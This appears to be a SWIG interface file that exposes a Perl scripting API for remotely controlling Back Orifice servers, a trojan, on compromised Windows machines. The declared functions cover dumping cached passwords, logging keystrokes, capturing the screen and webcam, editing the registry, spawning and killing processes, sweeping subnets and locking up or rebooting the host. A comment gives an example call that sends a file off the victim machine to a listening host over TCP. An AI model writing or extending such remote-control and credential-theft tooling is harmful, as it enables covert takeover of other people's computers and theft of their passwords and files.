/* boscript.i */

%title "BoScript"
%{
/* header files */

%}


%section "Utility Functions"
extern int bo_init();
  /* Call this function before calling any other boscript functions */
extern int bo_sethost(char *hostname);
  /* where hostname can be the name of a host or an IP address.
     This function must be called before any other functions that access
     a BO Server. */
extern int bo_setport(int portnum);
  /* Set the port to access on the BO Server. If uncalled before accessing
     a server or sweeping, the default (31337) will be used. */
extern int bo_setpass(char *password);
  /* Set the encryption password to 'password'.  If uncalled, the default
     of no password is used. */
extern char* bo_getpass();
  /* Report back currently set encryption password.  One of the few functions
     that does not return a success/failure int. */
extern int bo_setverbose();
  /* Turn on program verbosity.  Status updates and useless messages will
     be pumped to stdout.  Verbosity is off by default. */
extern int bo_unsetverbose();
  /* Unset program verbosity.  This is the default, so this function is only
     needed if verbosity had been previously enabled. */
extern char* bo_gettext();
  /* All functions that access the BO Server return one or more text lines
     as results to convey information or indicate success/failure of the
     command on the server side.  This function returns a perl string
     containing all lines output from the Server from the last command sent.
     The script is expected to parse this lines to determine the success or
     failure of commands. (this may change in a future version).
     Multiline outputs are given as one long string, and can be divided into
     individual lines with the perl 'split' function. */
extern char* bo_settimeout(int time_out);
  /* Will change to timeout value for commands to 'time_out' for only
     the next issued command.  This is useful for long running commands
     such as 'find'. */

%section "File Functions"
  /* All File functions that accept a filename or path for a parameter
     expect the full path (including drive letter) with the short (DOS)
     filenames (eg. 'PROGRA~1' instead of 'Program Files').  Also, backslashes
     must be escaped. */
extern int bo_ls(char *dir);
  /* List files.  The full path and wildcard specifier must be passed as the
     dir argument.  Short filenames must be given, as opposed to long
     ones.  Example:
     boscript::ls("c:\\progra~1\*"); */
extern int bo_rm(char *filename);
  /* Remove file.  */
extern int bo_cp(char *src, char *dst);
  /* Copy file from file1 to file2. */
extern int bo_ren(char *file1, char *file2);
  /* Rename file1 to file2.  Full path expected. */
extern int bo_find(char *filename, char *path);
  /* Find the file specified by 'filename', searching all subdirectories
     underneath 'path'.  Wildcards are allowed.  Example:
     boscript::find("*.dll", "c:\\windows"); */
extern int bo_mkdir(char *dir);
  /* Make directory. */
extern int bo_rmdir(char *dir);
  /* Remove directory */
extern int bo_freeze(char *src, char *dst);
  /* Freeze (compress) a file. */
extern int bo_melt(char *src, char *dst);
  /* Melt (uncompress) a file */
extern int bo_fileview(char *filename);
  /* View a text file */
extern int bo_tcpsend(char *filename, char *ip_port);
  /* Send the file 'filename' to the IP address and port given by 'ip_port'.
     Example:
     boscript::tcpsend("c:\\autoexec.bat", "192.168.0.52:85");
     would send the autoexec file to host 192.168.0.52 on port 85.
     Programs such as 'netcat' cat listen and receive files sent this way. */
extern int bo_tcprecv(char *filename, char *ip_port);
  /* Connect to the IP address and port given by 'ip_port' and receive the
     file that is sent over that connection.  The file will be saved as
     'filename' */
extern int bo_get(char *local_filename, char *remote_filename);
extern int bo_put(char *local_filename, char *remote_filename);

     
%section "Network Functions"
extern int bo_netview();
extern int bo_netlist();
extern int bo_netconnect(char *resource);
extern int bo_netdisconnect(char *resource);
extern int bo_resolve(char *hostname);
extern int bo_sharelist();
extern int bo_shareadd(char *sharename, char *path);
extern int bo_sharedel(char *sharename);
extern int bo_redirlist();
extern int bo_rediradd(char *input_port, char *dest_ip);
extern int bo_redirdel(char *redir_id);

%section "Registry Functions"
extern int bo_reglistkeys(char *keyname);
extern int bo_regmakekey(char *keyname);
extern int bo_regdelkey(char *keyname);
extern int bo_reglistvals(char *keyname);
extern int bo_regsetval(char *valuename, char *data);
extern int bo_regdelval(char *valuename);

%section "Process Functions"
extern int bo_proclist();
extern int bo_prockill(char *proc_id);
  /* Kill the process defined by 'proc_id'.  Process id's may be determined
     from the output of the 'proclist()' command. */
extern int bo_procspawn(char *cmdline);

%section "Console Program Functions"
extern int bo_applist();
extern int bo_appadd(char *exename, char *inputport);
extern int bo_appdel(char *app_id);

%section "Plugin Functions"
extern int bo_pluginlist();
extern int bo_pluginexec(char *plugin, char *plugin_args);
extern int bo_pluginkill(char *plugin_id);

%section "Multimedia Functions"
extern int bo_listcaps();
extern int bo_capframe(char *filename, char *devicespec);
extern int bo_capavi(char *filename, char *devicespec);
extern int bo_capscreen(char *filename);
extern int bo_sound(char *filename);

%section "Web Server Functions"
extern int bo_httpon(char *httpport, char *path);
extern int bo_httpoff();

%section "Miscellaneous Functions"
extern int bo_ping();
extern int bo_sweep(char *subnet);
  /* Sweep a subnet.  Will return a 0 if any of the pings are returned and
     return a 1 if the sweep was unsuccessful.  A call to gettext() can
     then determine which IP's answered. */
extern int bo_sysinfo();
extern int bo_passes();
  /* List passwords cached in the remote system's memory.  Garbage may be
     appended to the end of the line. */
extern int bo_dialog(char *message, char *title);
extern int bo_reboot();
extern int bo_lockup();
extern int bo_logkeys(char *filename);
  /* Log all keystrokes to 'filename'.  Sending the string 'STOP' as the
     filename will cause the server to stop logging keystrokes. */


